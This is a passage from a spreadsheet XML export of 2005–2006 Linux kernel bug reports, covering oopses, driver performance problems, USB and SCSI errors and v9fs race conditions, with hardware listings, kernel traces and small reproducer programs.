    <t>2006-07-30 10:23 UTC</t>
  </si>
  <si>
    <t>[please reassign to the correct component if my guess was not right. might be ram, disk or xfs related, among other things.] Problem Description: Oops: 0000 [#1] Modules linked in: ipt_LOG iptable_filter ip_tables bttv video_buf firmware_class i2c_algo_bit v4l2_common btcx_risc tveeprom videodev i pip ide_cd cdrom uhci_hcd sd_mod sata_sil libata scsi_mod ehci_hcd usbcore snd_intel8x0 snd_ac97_codec sis_agp agpgart isofs it87 i2c_se nsor i2c_isa snd_pcm_oss snd_pcm snd_timer snd_page_alloc snd_mixer_oss snd soundcore tun hisax isdn slhc psmouse i2c_viapro i2c_core ip v6 8139too sundance mii crc32 CPU: 0 EIP: 0060:[&lt;c0115b0b&gt;] Not tainted VLI EFLAGS: 00010002 (2.6.13) EIP is at do_page_fault+0xcb/0x6dd eax: c8b4f000 ebx: 0000000b ecx: 0000000d edx: 07070707 esi: 0000000e edi: c040e2d8 ebp: c8b4f1dc esp: c8b4f10c ds: 007b es: 007b ss: 0068 Unable to handle kernel paging request at virtual address 08080880 [....] Lots of oops (attaching to the report) when disk is stressed (usually bonnie++ freezes at "writing intelligently" phase). memtest86+ was running for hours without error. machine freezes with or without swap. disks are believed to be good (smart, badblocks) CPU is not overclocked and temp is resonable. I cannot point to any hardware fault (not being familiar with kernel internals this deep), but not impossible. Bonnie++ can crash it almost anytime. Did under 2.6.8.1, 2.6.12.* and does under 2.6.13 too. Distribution: kernel.org Hardware Environment: Intel(R) Celeron(R) CPU 2.00GHz, 512M RAM # lspci 0000:00:00.0 Host bridge: Silicon Integrated Systems [SiS] SiS645DX Host &amp; Memory &amp; AGP Controller 0000:00:01.0 PCI bridge: Silicon Integrated Systems [SiS] Virtual PCI-to-PCI bridge (AGP) 0000:00:02.0 ISA bridge: Silicon Integrated Systems [SiS] SiS962 [MuTIOL Media IO] (rev 04) 0000:00:02.1 SMBus: Silicon Integrated Systems [SiS]: Unknown device 0016 0000:00:02.5 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] 0000:00:02.7 Multimedia audio controller: Silicon Integrated Systems [SiS] Sound Controller (rev a0) 0000:00:03.0 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 0f) 0000:00:03.1 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 0f) 0000:00:03.2 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 0f) 0000:00:03.3 USB Controller: Silicon Integrated Systems [SiS] USB 2.0 Controller 0000:00:08.0 Network controller: Eicon Networks Corporation Diva 2.01 S/T PCI (rev 01) 0000:00:09.0 RAID bus controller: Silicon Image, Inc. (formerly CMD Technology Inc) SiI 3112 [SATALink/SATARaid] Serial ATA Controller (rev 02) 0000:00:0a.0 VGA compatible controller: S3 Inc. ViRGE/DX or /GX (rev 01) 0000:00:0c.0 Ethernet controller: D-Link System Inc DL10050 Sundance Ethernet # mount /dev/hda7 on / type xfs (rw,usrquota) proc on /proc type proc (rw,gid=104) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620,gid=5,mode=620) tmpfs on /dev/shm type tmpfs (rw) /dev/hdc2 on /var/lib/backuppc type ext3 (rw) none on /dev type tmpfs (rw,size=5M,mode=0755) none on /proc/bus/usb type usbfs (rw) /dev/mapper/vg0-backup on /mnt/lvm/backup type xfs (rw) /dev/mapper/vg0-db on /mnt/lvm/db type xfs (rw) Software Environment: Debian GNU/Linux unstable (SID) Steps to reproduce: start bonnie++ on / [EIDE] or ..vg0-db/ [SATA], wait, crash.</t>
  </si>
  <si>
    <t>fpathconf(fd, _PC_LINK_MAX) returns -1 and errno of 0</t>
  </si>
  <si>
    <t>Linux version 2.6.13-mm2</t>
  </si>
  <si>
    <t>2005-09-09 14:40 UTC</t>
  </si>
  <si>
    <t>2005-10-10 13:33 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:Linux version 2.6.13 rc6 mm2 Distribution:SLES 9 SP2 Hardware Environment:xseries x305 Software Environment:Linux version 2.6.13-mm2 Problem Description: fpathconf(fd, _PC_LINK_MAX) returns -1 but the errno is set to 0. If I run this on an earlier kernel, the rc is not -1 as I would expect. Steps to reproduce: #include &lt;fcntl.h&gt; #include &lt;unistd.h&gt; #include &lt;errno.h&gt; #include &lt;string.h&gt; #include &lt;signal.h&gt; int main(int ac, char **av) { int fd, rc; if ( (fd=open("fpafile01", O_RDWR|O_CREAT, 0700)) == -1 ) printf("Unable to open temp file %s!", "fpafile01"); rc = fpathconf(fd, _PC_LINK_MAX); printf("fpathconf(fd, _PC_LINK_MAX) returned rc = %d, errno = %d : %s\n", rc, errno, strerror(errno)); if (close(fd) == -1) { printf("close(%s) Failed, errno=%d : %s", "fpafile01", errno, strerror(errno)); } return 0; }</t>
  </si>
  <si>
    <t>sis5513 patch to support sis 965L</t>
  </si>
  <si>
    <t>up to 2.6.13</t>
  </si>
  <si>
    <t>2005-09-10 15:53 UTC</t>
  </si>
  <si>
    <t>rudolph</t>
  </si>
  <si>
    <t>2006-01-12 05:36 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: debian, though this is distribution independent Hardware Environment: - motherboard: ASUS K8S-MX with a SiS 760GX/SiS 965L - IDE drive: almost anything that does ata/33 or above; I have: hda: ST380011A, ATA DISK drive hda: max request size: 1024KiB hda: 156301488 sectors (80026 MB) w/2048KiB Cache, CHS=16383/255/63, UDMA(100) hda: cache flushes supported Software Environment: up to vanilla 2.6.13 kernel.org kernel Problem Description: sis5513 ide driver does not support 965L chipset in the above motherboard properly, leading to very slow performance. Steps to reproduce: boot with kernel up to 2.6.13 that has CONFIG_BLK_DEV_SIS5513=y and run "hdparm -t &lt;device&gt;" to see slow performance. I get about 3Mb/s with the above configuration.</t>
  </si>
  <si>
    <t>2.6.13.1</t>
  </si>
  <si>
    <t>usb mass storage (mp3-player) i/o errors while read or write</t>
  </si>
  <si>
    <t>2.6.12.5, 2.6.13.1, 2.6.14.1</t>
  </si>
  <si>
    <t>2005-09-12 10:14 UTC</t>
  </si>
  <si>
    <t>Florian Mickler</t>
  </si>
  <si>
    <t>2006-02-19 09:46 UTC</t>
  </si>
  <si>
    <t xml:space="preserve">- attaching my mp3-player(brand and so on see dmesg output at the bottom) to my usb-port does result in dmesg-errors - mounting it goes well - writing to it goes well until sync or umount gets executed ... then there are dozens of errors about i/o error. </t>
  </si>
  <si>
    <t>usb hid 'relative' input events incorrectly treated as 'absolute' events</t>
  </si>
  <si>
    <t>2005-09-12 12:36 UTC</t>
  </si>
  <si>
    <t>Jochen Eisinger</t>
  </si>
  <si>
    <t>2007-08-09 05:39 UTC</t>
  </si>
  <si>
    <t>The Dell Multimedia Keyboard SK-8135 has a volume control knob which generates 'relative' input events. These events are mapped by usb-input.c to the (absolute) ABS_VOLUME event. The relative input events, however, should be mapped to some relative event like REL_VOLUME (see attached patch)</t>
  </si>
  <si>
    <t>scsi_eh not get released by disconnecting the device when doing rescan</t>
  </si>
  <si>
    <t>2.6.13-mm1, 2.6.14-rc4, 2.6.14</t>
  </si>
  <si>
    <t>2005-09-12 21:11 UTC</t>
  </si>
  <si>
    <t>2005-11-23 11:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13-mm1 Distribution: Mandriva Linux release 2006.0 (Cooker) for i586 Hardware Environment: i686 Intel(R) Pentium(R) 4 CPU 3.00GHz Software Environment: Problem Description: I try to detect if the media is removed for the USB card readers. The steps are simple. Just to check if the corresponding /sys files are still existent and write the /sys rescan file to do the actual USB rescan. However, it seems a race condition happens when doing the rescan since the user may also manually disconnect the USB card reader at the same time. The write() to the rescan file seems blocked forever (although can be killed normally by CTRL-C the program) and the corresponding scsi_eh_XX driver won't get released. I write this program in Python and it's large. As a result, I write another small perl program to emulate the behavior. However, it seems that the perl program won't hang like python. It's odd. But at least it tells you the steps in rough. By the way, Kernel 2.6.11 seems okay... The patches I used in this kernel is: -mm1 http://marc.theaimsgroup.com/?l=linux-usb-devel&amp;m=112551468126219&amp;w=2 msleep(2000) in drivers/usb/storage/transport.c's Handle_Errors: "Fix errors in the SCSI core" patch in http://bugzilla.kernel.org/show_bug.cgi?id=5195 ===================================================================== #!/usr/bin/perl use Time::HiRes qw(usleep); $n = $ARGV[0]; $deviceDir = "/sys/devices/pci0000:00/0000:00:1d.7/usb5/5-1/5-1:1.0"; $rescanFile = "$deviceDir/host$n/target$n:0:0/$n:0:0:0/rescan"; $sizeFile = "$deviceDir/host$n/target$n:0:0/$n:0:0:0/block/size"; while (1) { if (! -d $deviceDir) { print "\"$deviceDir\" is gone!\n"; last; } if (! -e $sizeFile) { print "\"$sizeFile\" is gone!\n"; last; } $size = `$sizeFile`; chop($size); if ($size eq "0") { print "Size becomes 0!\n"; last; } print "***open $rescanFile\n"; open (RESCAN, "&gt;$rescanFile") or die "Failed to open file\n"; print "write 1 to rescan file\n"; print RESCAN "1"; print "try to close\n"; close RESCAN; print "close done\n"; usleep(100000); # 0.1 second } print "Finish!!!!!!"; ===================================================================== PS result after the test: ~/mptester 1040$ ps -eo pid,tid,class,rtprio,ni,pri,psr,pcpu,stat,wchan:30,comm | grep usb ~/mptester 1041$ ps -eo pid,tid,class,rtprio,ni,pri,psr,pcpu,stat,wchan:30,comm | grep scsi 7561 7561 TS - 0 19 0 0.0 S - scsi_eh_22 The /var/log/kernel/info is attached as info.050913.bz2.</t>
  </si>
  <si>
    <t>include/linux/joystick.h line 142 #error Unexpected BITS_PER_LONG</t>
  </si>
  <si>
    <t>&gt;= 2.6.13</t>
  </si>
  <si>
    <t>2005-09-13 09:10 UTC</t>
  </si>
  <si>
    <t>kyler</t>
  </si>
  <si>
    <t>2005-11-17 14:02 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.12.6 Distribution: Hardware Environment: intel p4 x86 Software Environment: LFS Problem Description: xorg compiled cleanly against include/linux/joystick.h prior to 2.6.13 Steps to reproduce: compile latest xorg release (xorg.freedesktop.org) against linux 2.6.13.1 sources in /usr/include/linux and the compile will fail. Worked fine in 2.6.12.6 - In file included from xf86Ur-98.c:8: /usr/include/linux/joystick.h:131: error: parse error before "__s64" /usr/include/linux/joystick.h:132: error: ISO C forbids data definition with no type or storage class /usr/include/linux/joystick.h:135: error: parse error before '}' token In file included from xf86Ur-98.c:8: /usr/include/linux/joystick.h:142:2: #error Unexpected BITS_PER_LONG</t>
  </si>
  <si>
    <t>MegaRAID HW RAID1 detected as zero size drive</t>
  </si>
  <si>
    <t>2.6.14-rc1</t>
  </si>
  <si>
    <t>2005-09-13 12:41 UTC</t>
  </si>
  <si>
    <t>2005-10-04 06:24 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13 Distribution: Debian Testing Hardware Environment: Dell PowerEDGE 1300, MegaRAID with two SCSI drives in RAID1, two CPUs Software Environment: Linux RTIX-NM-003 2.6.13 #8 SMP Wed Aug 31 16:38:12 EDT 2005 i686 GNU/Linux Gnu C 2.95.4 Gnu make 3.80 binutils 2.16.1 util-linux 2.12p mount 2.12p module-init-tools 3.2-pre1 e2fsprogs 1.37 reiserfsprogs line reiser4progs line Linux C Library 2.3.5 Dynamic linker (ldd) 2.3.5 Procps 3.2.5 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.2.1 Problem Description: When booting with 2.6.14-rc1, my RAID1 array is seen as a 0 megabyte drive. This causes the kernel to not be able to mount the filesystem, and thus, a panic. 2.6.13: megaraid: found 0x8086:0x1960:bus 0:slot 13:func 1 scsi0:Found MegaRAID controller at 0xf8802000, IRQ:185 megaraid: [1.06:1p00] detected 1 logical drives. megaraid: channel[0] is raid. megaraid: channel[1] is raid. scsi0 : LSI Logic MegaRAID 1.06 254 commands 16 targs 5 chans 7 luns scsi0: scanning scsi channel 0 for logical drives. Vendor: MegaRAID Model: LD0 RAID1 8568R Rev: 1.06 Type: Direct-Access ANSI SCSI revision: 02 scsi0: scanning scsi channel 4 [P0] for physical devices. scsi0: scanning scsi channel 5 [P1] for physical devices. st: Version 20050501, fixed bufsize 32768, s/g segs 256 SCSI device sda: 17547264 512-byte hdwr sectors (8984 MB) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ sda: asking for cache data failed sda: assuming drive cache: write through SCSI device sda: 17547264 512-byte hdwr sectors (8984 MB) sda: asking for cache data failed sda: assuming drive cache: write through sda: sda1 Attached scsi disk sda at scsi0, channel 0, id 0, lun 0 2.6.14-rc1: megaraid: found 0x8086:0x1960:bus 0:slot 13:func 1 scsi0:Found MegaRAID controller at 0xf8802000, IRQ:185 megaraid: [1.06:1p00] detected 1 logical drives. megaraid: channel[0] is raid. megaraid: channel[1] is raid. scsi0 : LSI Logic MegaRAID 1.06 254 commands 16 targs 5 chans 7 luns scsi0: scanning scsi channel 0 for logical drives. Vendor: MegaRAID Model: LD0 RAID1 8568R Rev: 1.06 Type: Direct-Access ANSI SCSI revision: 02 scsi0: scanning scsi channel 4 [P0] for physical devices. scsi0: scanning scsi channel 5 [P1] for physical devices. st: Version 20050830, fixed bufsize 32768, s/g segs 256 sda : sector size 0 reported, assuming 512. SCSI device sda: 1 512-byte hdwr sectors (0 MB) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ sda: asking for cache data failed sda: assuming drive cache: write through sda : sector size 0 reported, assuming 512. SCSI device sda: 1 512-byte hdwr sectors (0 MB) sda: asking for cache data failed sda: assuming drive cache: write through sda: sda1 Attached scsi disk sda at scsi0, channel 0, id 0, lun 0</t>
  </si>
  <si>
    <t>ipw2200 fills log with Driver using old /proc/net/wireless support</t>
  </si>
  <si>
    <t>2.6.14-rc4</t>
  </si>
  <si>
    <t>2005-09-14 08:02 UTC</t>
  </si>
  <si>
    <t>2005-12-28 14:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: Steps to reproduce: Use the ipw2200 driver. The ipw2200-module in 2.6.14-rc1 fills dmesg up with this warning: eth1 (WE) : Driver using old /proc/net/wireless support, please fix driver !</t>
  </si>
  <si>
    <t>Add component for v9fs file system module</t>
  </si>
  <si>
    <t>2005-09-15 07:13 UTC</t>
  </si>
  <si>
    <t>Eric Van Hensbergen</t>
  </si>
  <si>
    <t>2005-09-23 06:01 UTC</t>
  </si>
  <si>
    <t>v9fs was added to the 2.6.14-rc1 tree, please add a component to the kernel bug tracker and make the default owner ericvh@gmail.com. Thanks.</t>
  </si>
  <si>
    <t>Race condition in fid selection</t>
  </si>
  <si>
    <t>v9fs</t>
  </si>
  <si>
    <t>2005-09-15 07:44 UTC</t>
  </si>
  <si>
    <t>2006-02-25 16:31 UTC</t>
  </si>
  <si>
    <t>Latchesar Ionkov</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: x86 Software Environment: Problem Description: There is a race condition in open (and potentially create) where there is an extended period of time between when a fid is selected to be used to open a file and when that fid gets marked as inelligble to be used for future opens. This triggers a bug when running bonnie. Steps to reproduce: Run bonnie on x86 on top of v9fs loopback on an x86 system</t>
  </si>
  <si>
    <t>Interrupt readdir causes problems</t>
  </si>
  <si>
    <t>2005-09-15 07:46 UTC</t>
  </si>
  <si>
    <t>2006-02-25 16:30 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N/A Distribution: Hardware Environment: x86 Software Environment: Problem Description: Interrupting the system during a readdir of a large v9fs can cause problems Steps to reproduce: ls -l /dev ^C</t>
  </si>
  <si>
    <t>Writes to the transport can be interrupted by signals</t>
  </si>
  <si>
    <t>2005-09-15 07:50 UTC</t>
  </si>
  <si>
    <t>2006-02-25 16:32 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: Currently the writes to the transport are done in the context of the user process performing the VFS operation. If the write on the transport blocks after some data was sent, and the process receives a signal, the rest of the 9P message won't be sent, leaving the 9P session in undefined state. Steps to reproduce:</t>
  </si>
  <si>
    <t>Kernel Oopses while running iozone</t>
  </si>
  <si>
    <t>2005-09-15 19:24 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: FC4 Hardware Environment: Software Environment: Problem Description: Kernel Oopses while running iozone. Steps to reproduce: 1. Install iozone3_248 2. Mount u9fs using v9fs 3. Go to directory served by u9fs 4. Run iozone -a</t>
  </si>
  <si>
    <t>kernel BUG at mm/page_alloc.c:1014! (skge &amp; bonding releated)</t>
  </si>
  <si>
    <t>2005-09-17 06:57 UTC</t>
  </si>
  <si>
    <t>2005-09-27 09:48 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware Hardware Environment: # lspci -vvv 00:00.0 Host bridge: Intel Corporation 82845G/GL[Brookdale-G]/GE/PE DRAM Controller/Host-Hub Interface (rev 03) Subsystem: Intel Corporation 82845G/GL[Brookdale-G]/GE/PE DRAM Controller/Host-Hub Interface Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Region 0: Memory at e8000000 (32-bit, prefetchable) [size=32M] Capabilities: [e4] #09 [1105] 00:02.0 VGA compatible controller: Intel Corporation 82845G/GL[Brookdale-G]/GE Chipset Integrated Graphics Device (rev 03) (prog-if 00 [VGA]) Subsystem: Intel Corporation 82845G/GL[Brookdale-G]/GE Chipset Integrated Graphics Device Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 5 Region 0: Memory at e0000000 (32-bit, prefetchable) [size=128M] Region 1: Memory at ea100000 (32-bit, non-prefetchable) [size=512K] Expansion ROM at &lt;unassigned&gt; [disabled] Capabilities: [d0] Power Management version 1 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:1d.0 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #1 (rev 02) (prog-if 00 [UHCI]) Subsystem: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #1 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 169 Region 4: I/O ports at d400 [size=32] 00:1d.1 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #2 (rev 02) (prog-if 00 [UHCI]) Subsystem: Intel Corporation: Unknown device 24c2 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 193 Region 4: I/O ports at d000 [size=32] 00:1d.7 USB Controller: Intel Corporation 82801DB/DBM (ICH4/ICH4-M) USB2 EHCI Controller (rev 02) (prog-if 20 [EHCI]) Subsystem: Intel Corporation 82801DB/DBM (ICH4/ICH4-M) USB2 EHCI Controller Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin D routed to IRQ 9 Region 0: Memory at ea180000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev 82) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR+ Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=32 I/O behind bridge: 0000c000-0000cfff Memory behind bridge: ea000000-ea0fffff Prefetchable memory behind bridge: 1f800000-1f8fffff BridgeCtl: Parity- SERR+ NoISA+ VGA- MAbort- &gt;Reset- FastB2B- 00:1f.0 ISA bridge: Intel Corporation 82801DB/DBL (ICH4/ICH4-L) LPC Interface Bridge (rev 02) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:1f.1 IDE interface: Intel Corporation 82801DB (ICH4) IDE Controller (rev 02) (prog-if 8a [Master SecP PriP]) Subsystem: Intel Corporation: Unknown device 24c2 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 185 Region 0: I/O ports at &lt;unassigned&gt; Region 1: I/O ports at &lt;unassigned&gt; Region 2: I/O ports at &lt;unassigned&gt; Region 3: I/O ports at &lt;unassigned&gt; Region 4: I/O ports at f000 [size=16] Region 5: Memory at 1f900000 (32-bit, non-prefetchable) [size=1K] 00:1f.3 SMBus: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) SMBus Controller (rev 02) Subsystem: Intel Corporation: Unknown device 24c2 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin B routed to IRQ 3 Region 4: I/O ports at 0500 [size=32] 00:1f.5 Multimedia audio controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Audio Controller (rev 02) Subsystem: Albatron Corp.: Unknown device 2402 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 3 Region 0: I/O ports at dc00 [size=256] Region 1: I/O ports at e000 [size=64] Region 2: Memory at ea181000 (32-bit, non-prefetchable) [size=512] Region 3: Memory at ea182000 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 01:00.0 Ethernet controller: 3Com Corporation 3CSOHO100B-TX 910-A01 [tulip] (rev 31) Subsystem: 3Com Corporation: Unknown device 1000 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (16000ns min, 32000ns max), cache line size 08 Interrupt: pin A routed to IRQ 177 Region 0: I/O ports at c000 [size=256] Region 1: Memory at ea024000 (32-bit, non-prefetchable) [size=1K] Expansion ROM at 1f800000 [disabled] [size=128K] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=100mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 01:04.0 Ethernet controller: 3Com Corporation 3c940 10/100/1000Base-T [Marvell] (rev 10) Subsystem: 3Com Corporation 3C941 Gigabit LOM Ethernet Adapter Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (5750ns min, 7750ns max), cache line size 08 Interrupt: pin A routed to IRQ 169 Region 0: Memory at ea020000 (32-bit, non-prefetchable) [size=16K] Region 1: I/O ports at c400 [size=256] Expansion ROM at 1f820000 [disabled] [size=128K] Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=1 PME- Capabilities: [50] Vital Product Data # cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 1 model name : Intel(R) Celeron(R) CPU 1.70GHz stepping : 3 cpu MHz : 1697.545 cache size : 128 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm bogomips : 3398.33 # cat /proc/ioports 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-006f : keyboard 0070-0077 : rtc 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : ide1 01f0-01f7 : ide0 0376-0376 : ide1 03c0-03df : vga+ 03f6-03f6 : ide0 03f8-03ff : serial 0400-047f : 0000:00:1f.0 0400-0403 : PM1a_EVT_BLK 0404-0405 : PM1a_CNT_BLK 0408-040b : PM_TMR 0428-042f : GPE0_BLK 0480-04bf : 0000:00:1f.0 0500-051f : 0000:00:1f.3 0cf8-0cff : PCI conf1 c000-cfff : PCI Bus #01 c000-c0ff : 0000:01:00.0 c000-c0ff : tulip c400-c4ff : 0000:01:04.0 c400-c4ff : skge d000-d01f : 0000:00:1d.1 d000-d01f : uhci_hcd d400-d41f : 0000:00:1d.0 d400-d41f : uhci_hcd dc00-dcff : 0000:00:1f.5 e000-e03f : 0000:00:1f.5 f000-f00f : 0000:00:1f.1 f000-f007 : ide0 f008-f00f : ide1 # cat /proc/iomem 00000000-0009fbff : System RAM 00000000-00000000 : Crash kernel 0009fc00-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000c7fff : Video ROM 000d0000-000d1fff : Adapter ROM 000d2000-000d27ff : Adapter ROM 000f0000-000fffff : System ROM 00100000-1f7effff : System RAM 00100000-0044f079 : Kernel code 0044f07a-00597da7 : Kernel data 1f7f0000-1f7f2fff : ACPI Non-volatile Storage 1f7f3000-1f7fffff : ACPI Tables 1f800000-1f8fffff : PCI Bus #01 1f800000-1f81ffff : 0000:01:00.0 1f820000-1f83ffff : 0000:01:04.0 1f900000-1f9003ff : 0000:00:1f.1 e0000000-e7ffffff : 0000:00:02.0 e8000000-e9ffffff : 0000:00:00.0 ea000000-ea0fffff : PCI Bus #01 ea020000-ea023fff : 0000:01:04.0 ea020000-ea023fff : skge ea024000-ea0243ff : 0000:01:00.0 ea024000-ea0243ff : tulip ea100000-ea17ffff : 0000:00:02.0 ea180000-ea1803ff : 0000:00:1d.7 ea181000-ea1811ff : 0000:00:1f.5 ea182000-ea1820ff : 0000:00:1f.5 fec00000-ffffffff : reserved Software Environment: Linux space 2.6.13.1 #1 SMP Sat Sep 17 13:53:24 CEST 2005 i686 unknown unknown GNU/Linux Gnu C 3.3.6 Gnu make 3.80 binutils 2.15.92.0.2 util-linux 2.12p mount 2.12p module-init-tools 3.1 e2fsprogs 1.38 reiserfsprogs line reiser4progs line quota-tools 3.12. Linux C Library 2.3.5 Dynamic linker (ldd) 2.3.5 Linux C++ Library 5.0.7 Procps 3.2.5 Net-tools 1.60 Kbd 1.12 Sh-utils 5.2.1 Modules Loaded bonding Problem Description: Kernel logs BUG and hangs or oopses. Two logs: BUG &amp; Oops, from two different kernel boots. ------------[ cut here ]------------ kernel BUG at mm/page_alloc.c:1014! invalid operand: 0000 [#1] PREEMPT SMP Modules linked in: bonding CPU: 0 EIP: 0060:[&lt;c0150594&gt;] Not tainted VLI EFLAGS: 00010256 (2.6.13.1) EIP is at __free_pages+0x44/0x50 eax: 00000000 ebx: df752000 ecx: c139e500 edx: 00000003 esi: 00000000 edi: c1555620 ebp: 00000000 esp: da2bfdac ds: 007b es: 007b ss: 0068 Process ifenslave (pid: 765, threadinfo=da2be000 task=da211a60) Stack: df752000 00000000 c0308678 df752044 00005000 dcf28000 1cf28000 00000001 c1555400 da2bfe44 c1555620 c0309f34 c1555400 00000046 00000000 da2bfe44 c1555400 da2bfe4c da2bfe46 c03998b0 c1555400 da2bfe44 c0124ad7 